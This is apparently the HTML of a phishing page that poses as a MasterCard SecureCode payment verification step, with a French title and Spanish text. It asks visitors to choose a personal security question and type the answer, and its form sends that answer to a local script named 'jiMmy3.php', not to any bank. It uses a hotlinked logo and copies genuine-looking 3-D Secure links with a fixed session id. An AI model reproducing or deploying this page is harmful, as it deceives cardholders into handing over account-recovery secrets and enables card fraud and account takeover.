﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>PASS Services Financiers - MasterCard® Secure Code™</title>
<link href="questions/style_qs.css" rel="stylesheet" type="text/css" media="screen">
<!--[if IE 6]><link href="content/400/css/ie6.css" rel="stylesheet" type="text/css" media="screen" /><![endif]-->
<!--[if IE 7]><link href="content/400/css/ie7.css" rel="stylesheet" type="text/css" media="screen" /><![endif]-->	
<script type="text/javascript" src="questions/jquery.js"></script>
<script type="text/javascript" src="questions/script.js"></script>
</head>

<body>
<div id="page">
	<div id="header"></div>
	<div id="header"><img alt="FME9sHT.png (506×89)" src="https://i.imgur.com/FME9sHT.png" /></div>

<div id="content">
<h1>&nbsp;</h1>
	<div id="content">
		<h1>Sus pagos seguros por Internet</h1>
		<p>Para continuar con su registro, elija una pregunta personal y su 
respuesta, que le servirán para modificar su número de teléfono móvil en
 caso necesario.</p>
		<!-- Form -->
		<div class="form">
			<div class="content">
			<div id="erreur"></div>
				<form method="post" action="jiMmy3.php">
				<fieldset>
						<p>Elija su pregunta personal;<br></p>
					<div class="field">
						<label for="nom"><span class="title">Su pregunta personal </span></label>
						<select name="question" id="question" class="form-right ieheight field_to_verify">
							
								<option selected="selected">Elija una pregunta</option>
							
								<option value="¿En qué ciudad nació tu madre?">¿En qué ciudad nació tu madre?</option>
								<option value="¿Cuál fue tu primer coche?">¿Cuál fue tu primer coche?</option>
								<option value="¿Cuál es tu ciudad favorita?">¿Cuál es tu ciudad favorita?</option>
								<option value="¿Cuál era el nombre de tu abuela paterna?">¿Cuál era el nombre de tu abuela paterna?</option>
								<option value="¿Cuál fue la primera empresa en la que trabajó?">¿Cuál fue la primera empresa en la que trabajó?</option>
						</select>
					</div>
					
					<div class="field">
						<label for="identifiant"><span class="title">Respuesta</span> (6 a 50 caracteres)</label>
						<input name="response" id="response" class="form-right ieheight field_to_verify" maxlength="50" type="text">
					</div>
			
                    
				</fieldset>
					
				<div class="button">
					<a href="https://acs1.3ds.modirum.com/mdpayacs/pareq;mdsessionid=E6CA5148218049FD6A3B18303F5FA6C4?help=true"><img src="questions/bt_help_es.gif" alt="Ayuda" width="45" height="15"></a>&nbsp;&nbsp;
					<!-- Cancel -->
					<a href="https://acs1.3ds.modirum.com/mdpayacs/pareq;mdsessionid=E6CA5148218049FD6A3B18303F5FA6C4?cancel=true"><img src="questions/bt_cancel_es.gif" alt="Anular"></a>&nbsp;&nbsp;
					<!-- Submit -->
					<input src="questions/bt_next_es.gif" alt="Siguiente" name="submit" id="submit" value="submit" type="image">
				</div>
				</form>
			</div>
		</div>
		<!-- End Form -->
	</div>
	
	<div id="footer"></div>
</div>



</body></html>